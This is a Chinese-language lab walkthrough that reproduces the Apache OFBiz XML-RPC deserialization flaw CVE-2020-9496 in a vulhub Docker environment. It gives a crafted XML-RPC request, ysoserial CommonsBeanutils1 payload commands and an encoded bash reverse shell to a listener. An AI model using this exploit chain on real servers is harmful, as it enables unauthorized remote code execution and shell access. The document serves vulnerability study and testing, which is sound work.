怎樣實現(xiàn)Apache Ofbiz XMLRPC RCE漏洞CVE-2020-9496的復(fù)現(xiàn)

這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)怎樣實現(xiàn)Apache Ofbiz XMLRPC RCE漏洞CVE-2020-9496的復(fù)現(xiàn)，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

0x00簡介

Apache OFBiz全稱是The ApacheOpen For Business Project。是開放的電子商務(wù)平臺，是一個非常著名的開源項目，提供了創(chuàng)建基于最新的J2EE/XML規(guī)范和技術(shù)標(biāo)準(zhǔn)，構(gòu)建大中型企業(yè)級、快平臺、跨數(shù)據(jù)庫、跨應(yīng)用服務(wù)器的多層、分布式電子商務(wù)類WEB應(yīng)用系統(tǒng)的框架。OFBiz幾乎實現(xiàn)了所有的J2EE核心設(shè)計模式，各個模塊之間的耦合比較松散，用戶能夠比較容易的根據(jù)自己的需要進(jìn)行拆卸，非常靈活。

0x01漏洞概述

Apache ofbiz 存在反序列化漏洞，攻擊者 通過 訪問未授權(quán)接口，構(gòu)造特定的xmlrpc http請求，可以造成遠(yuǎn)程代碼執(zhí)行的影響。

0x02影響版本

- Apache Ofbiz：< 17.12.04

0x03環(huán)境搭建

1、本次環(huán)境使用vulhub搭建，在裝有docker環(huán)境的虛擬機(jī)中下載

git clone https://github.com/vulhub/vulhub.git

2、進(jìn)入漏洞目錄，使用docker-compose拉取漏洞環(huán)境，看到綠色的done表示成功

cd vulhub/ofbiz/CVE-2020-9496/

docker-compose up -d

3、在瀏覽器訪問https://your-ip:8443/myportal/control/main訪問注冊頁面

4、安裝漏洞復(fù)現(xiàn)所需要的環(huán)境

4.1安裝java8環(huán)境

https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html根據(jù)自己系統(tǒng)版本選擇jdk下載

4.2下載完成創(chuàng)建一個文件夾，把下載好的java解壓到創(chuàng)建的文件

mkdir /opt/java

tar zxvf jdk-8u251-linux-x64.tar.gz -C /opt/java

4.3添加Java環(huán)境變量

vim /etc/profile

末尾增加

export JAVA_HOME=/opt/java/ jdk1.8.0_141

export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib

4.4添加完成后使用環(huán)境變量馬上生效，刷新完成后查看java版本

source /etc/profile

java -version

5、安裝maven，使用wget下載mvn

wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

mkdir /opt/maven

tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/

5.1配置環(huán)境變

vim /etc/profile

5.2在最下面增加

export MAVEN_HOME=/opt/maven/apache-maven-3.6.3

export PATH=$MAVEN_HOME/bin:$PATH

5.3添加完成后使用環(huán)境變量馬上生效，刷新完成后查看maven版本

source /etc/profile

mvn -version

0x04漏洞復(fù)現(xiàn)

1、在GitHub上下載java反序列化利用工具ysoserial,

git clone https://github.com/frohoff/ysoserial.git

2、進(jìn)入ysoserial目錄使用maven下載編譯需要得包，編譯成功為以下圖片

mvn clean package -DskipTests

3、在ysoserial目錄可以看到有一個target目錄，進(jìn)入此目錄

4、在頁面url訪問以下鏈接使用Burp抓包，并發(fā)送到Repeater模塊

https://your-ip:8443/webtools/control/xmlrpc

5、把數(shù)據(jù)包替換成以下數(shù)據(jù)包

POST /webtools/control/xmlrpc HTTP/1.1

Host: your-ip

Content-Type: application/xml

Content-Length: 4093

<?xml version="1.0"?>

<methodCall>

<methodName>ProjectDiscovery</methodName>

<params>

<param>

<value>

<struct>

<member>

<name>test</name>

<value>

<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>

</value>

</member>

</struct>

</value>

</param>

</params>

</methodCall>

6、使用使用ysoserial的CommonsBeanutils1來生成Payload在tmp目錄寫入文件

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

7、復(fù)制base64編碼得payload，粘貼到burp數(shù)據(jù)包中base64payload的地方，點擊發(fā)送，可以進(jìn)docker中查看是否寫入成功

8、利用漏洞反彈shell，去以下網(wǎng)址把反彈shellpayload進(jìn)行base64編碼

http://www.jackson-t.ca/runtime-exec-payloads.html

9、把編碼后的shell在使用ysoserial工具進(jìn)行一次base64編碼

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"

10、nc設(shè)置監(jiān)聽，把生成的exp放入到burp的數(shù)據(jù)包中發(fā)送，查看nc監(jiān)聽以返回shell

0x05修復(fù)建議

1、建議升級至最新版本

上述就是小編為大家分享的怎樣實現(xiàn)Apache Ofbiz XMLRPC RCE漏洞CVE-2020-9496的復(fù)現(xiàn)了，如果剛好有類似的疑惑，不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識，歡迎關(guān)注億速云行業(yè)資訊頻道。